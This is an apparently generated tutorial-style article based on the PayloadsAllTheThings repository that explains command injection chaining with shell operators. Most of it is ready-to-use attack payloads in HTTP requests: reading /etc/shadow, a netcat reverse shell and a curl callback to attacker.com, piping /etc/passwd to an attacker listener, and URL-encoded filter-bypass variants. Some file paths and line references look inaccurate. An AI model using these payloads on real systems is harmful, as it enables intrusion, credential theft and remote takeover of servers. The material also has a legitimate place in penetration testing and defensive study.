# Command Injection Chaining Techniques: A Complete Guide to Shell Operators

> Master command injection chaining techniques to execute multiple shell commands with operators like ; && || & and |. Bypass filters and elevate your attack strategy.

- Repository: [Swissky/PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings)
- Tags: tutorial
- Published: 2026-03-01

---

**Command injection chaining techniques allow attackers to execute multiple shell commands in sequence using operators like `;`, `&&`, `||`, `&`, and `|` to bypass filters and escalate attacks.**

The *PayloadsAllTheThings* repository by swisskyrepo serves as the definitive resource for **command injection chaining techniques**, documenting how Unix shell operators can concatenate payloads to achieve complex attack flows. These operators enable everything from simple command sequencing to conditional execution and background processing, making them essential tools for penetration testers and security researchers analyzing vulnerable applications.

## Understanding Command Injection Chaining Operators

According to the `Command Injection/README.md` file in the repository, shell chaining operators function exactly as they do in standard Unix-like environments. Each operator provides distinct control flow characteristics that determine when and how subsequent commands execute.

### Semicolon (`;`) – Unconditional Execution

The semicolon operator executes the next command **unconditionally** after the first command finishes, regardless of success or failure. This is the most straightforward **command injection chaining technique** for sequential execution.

In `Command Injection/README.md`, the semicolon is listed first among chaining commands as the primary method for simple concatenation when you only need the second command to run.

```http
GET /vuln.php?cmd=whoami;id HTTP/1.1
Host: example.com

```

*Result:* The server runs `whoami`, completes it, then immediately runs `id` — both outputs appear in the HTTP response.

### Logical AND (`&&`) – Conditional Success

The double ampersand executes the second command **only if** the first returns exit status 0 (success). This operator is critical for **privilege escalation checks** and probe-based chaining documented in the repository.

```http
GET /vuln.php?cmd=grep -q root /etc/passwd && cat /etc/shadow HTTP/1.1
Host: example.com

```

*Result:* The sensitive `cat /etc/shadow` command executes only if the `grep` command successfully finds "root" in `/etc/passwd`.

### Logical OR (`||`) – Fallback Execution

The double pipe executes the second command **only if** the first fails (returns non-zero exit status). This **command injection chaining technique** creates fallback payloads when primary commands are blocked by filters.

```http
GET /vuln.php?cmd=cat /etc/passwd || cat /etc/shadow HTTP/1.1
Host: example.com

```

*Result:* If reading `/etc/passwd` is blocked or fails, the payload automatically attempts to read `/etc/shadow` instead.

### Ampersand (`&`) – Background Processing

The single ampersand runs the command **in the background**, causing the shell to immediately return to the next command without waiting. This technique hides long-running payloads or keeps HTTP requests open while the attack continues executing.

```http
GET /vuln.php?cmd=nc -e /bin/sh attacker.com 4444 & HTTP/1.1
Host: example.com

```

*Result:* The reverse shell spawns in the background, allowing the HTTP request to complete while maintaining the connection to the attacker's listener.

### Pipe (`|`) – Output Redirection

The pipe operator feeds the **stdout** of the left command into the **stdin** of the right command. This enables data exfiltration by streaming command output to network tools.

```http
GET /vuln.php?cmd=cat /etc/passwd | nc attacker.com 4444 HTTP/1.1
Host: example.com

```

*Result:* The contents of `/etc/passwd` are piped directly to the attacker's Netcat listener, enabling real-time data theft without writing to disk.

## Practical Payload Examples from PayloadsAllTheThings

The repository's `Command Injection/Intruder/command_exec.txt` file contains a curated list of real-world payload variations, including URL-encoded forms that bypass naive input filters. This file demonstrates how **command injection chaining techniques** adapt to different defensive contexts.

### URL-Encoded Newline (`%0a`) for Multi-Line Payloads

Newline characters serve as alternative command separators, particularly useful when space or semicolon characters are filtered. The repository documents `%0a` (newline) and `%0d%0a` (carriage return + newline) at lines 13-16 of [`command_exec.txt`](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/main/command_exec.txt).

```http
GET /vuln.php?cmd=id%0acurl%20http://attacker.com/%24HOST%24 HTTP/1.1
Host: example.com

```

*Result:* The server executes `id` on the first line, then executes `curl` on the subsequent line, effectively achieving the same result as semicolon chaining while bypassing character-specific filters.

### Combined Chaining for Complex Attack Flows

Advanced **command injection chaining techniques** combine multiple operators to create robust payloads that handle various failure scenarios:

```http
GET /vuln.php?cmd=ping -c 1 127.0.0.1 && id || whoami | nc attacker.com 4444 HTTP/1.1
Host: example.com

```

This pattern probes connectivity, attempts identification, falls back to basic user detection if the first command fails, and pipes all output to an external server.

## Evasion and Encoding Techniques

The `Command Injection/Intruder/command_exec.txt` and [`command-execution-unix.txt`](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/main/command-execution-unix.txt) files document critical encoding strategies for **command injection chaining techniques**:

- **Semicolon encoding:** `%3B` bypasses literal `;` filters
- **Logical AND encoding:** `%26%26` represents `&&` when ampersands are blocked
- **Pipe encoding:** `%7C` substitutes for `|` in strict input validation scenarios
- **Newline injection:** `%0a` and `%0d` achieve command separation without standard operators

These encodings enable attackers to execute chained commands even when applications implement character-based blacklists.

## Summary

- **Command injection chaining techniques** rely on standard Unix shell operators (`;`, `&&`, `||`, `&`, `|`) to execute multiple commands through a single injection point.
- The `Command Injection/README.md` file in *PayloadsAllTheThings* provides the canonical reference for operator behavior and selection criteria.
- The `Command Injection/Intruder/command_exec.txt` file contains production-ready payload variations including URL-encoded forms (`%0a`, `%3B`, `%26%26`) for filter bypass.
- **Conditional chaining** using `&&` and `||` enables intelligent payloads that adapt to the target environment's configuration and defenses.
- **Background execution** via `&` and **exfiltration piping** via `|` support advanced post-exploitation activities without triggering timeout errors.

## Frequently Asked Questions

### What is the most reliable command injection chaining operator for basic testing?

The **semicolon (`;`)** is the most reliable operator for initial testing because it executes commands unconditionally regardless of exit status. According to the *PayloadsAllTheThings* source code, this operator works in virtually all Unix-like shell environments and requires no conditional logic to succeed.

### When should I use `&&` instead of `;` in command injection payloads?

Use **logical AND (`&&`)** when you need to ensure the first command succeeds before executing the second, such as when probing for specific files or privileges before attempting escalation. The repository documents this pattern in `Command Injection/README.md` as essential for "privileged command after successful probe" scenarios.

### How can I bypass filters that block semicolons and ampersands?

Use **URL-encoded newline characters (`%0a`)** as documented in `Command Injection/Intruder/command_exec.txt` lines 13-16. Newlines function as command separators in shell environments, allowing you to execute `id%0awhoami` equivalent to `id;whoami` without using blocked characters.

### What is the difference between `&` and `&&` in command injection contexts?

The **single ampersand (`&`)** runs the preceding command in the background and immediately proceeds to the next command, while **double ampersand (`&&`)** acts as a logical AND that only executes the next command if the previous one succeeds (returns exit code 0). Background execution via `&` is particularly useful for maintaining reverse shells without hanging the HTTP request.